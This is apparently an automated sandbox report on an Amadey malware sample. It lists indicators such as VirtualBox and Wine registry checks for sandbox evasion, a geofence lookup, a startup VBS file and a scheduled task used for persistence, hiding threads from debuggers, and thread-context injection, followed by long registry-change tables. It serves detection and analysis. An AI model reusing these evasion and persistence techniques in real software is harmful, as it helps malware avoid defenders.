amadey | dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	axplons.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	Kaxhwswfup.exe

Executes dropped EXE 6 IoCs

pid	Process
4292	axplons.exe
2856	Kaxhwswfup.exe
4720	axplons.exe
4784	$77354151
648	$77af6dbd
3880	axplons.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
4292	axplons.exe
4720	axplons.exe
3880	axplons.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2856 set thread context of 4784	2856	Kaxhwswfup.exe	105
PID 4084 set thread context of 4820	4084	powershell.EXE	108
PID 2856 set thread context of 648	2856	Kaxhwswfup.exe	110

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3212	648	WerFault.exe	110

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe

Modifies data under HKEY_USERS 55 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={71141597-B88E-48A4-AD76-13AD089071B0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 23:34:03 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715729642"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = 664b073957a6da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f4d4073957a6da01f4d4073957a6da01f4d4073957a6da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000373939386434623438653766636533376565333664363862663062346438646631363831643562616361393530633662663138313865633633393037646463360000b20009000400efbeae5846bcae5846bc2e000000000000000000000000000000000000000000000000000c1d9800370039003900380064003400620034003800650037006600630065003300370065006500330036006400360038006200660030006200340064003800640066003100360038003100640035006200610063006100390035003000630036006200660031003800310038006500630036003300390030003700640064006300360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37393938643462343865376663653337656533366436386266306234643864663136383164356261636139353063366266313831386563363339303764646336000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0e84f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0e84f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\48bc7b06ea8322cd6af81d6a4508f3373b9b8b813bc998d6a224ceabe13c9f9a"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = 898fb33957a6da01	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5b9a1e40-892d-4bfe	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = 14630c3957a6da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7998d4b48e7fce37ee36d68bf0b4d8df1681d5baca950c6bf1818ec63907ddc6"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85b342c9-489a-45ce = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7998d4b48e7fce37ee36d68bf0b4d8df1681d5baca950c6bf1818ec63907ddc6"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e11eeeb7-8ced-457a = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = e5cccf3957a6da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000057e6583957a6da0178a5ba3957a6da0178a5ba3957a6da013f110a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003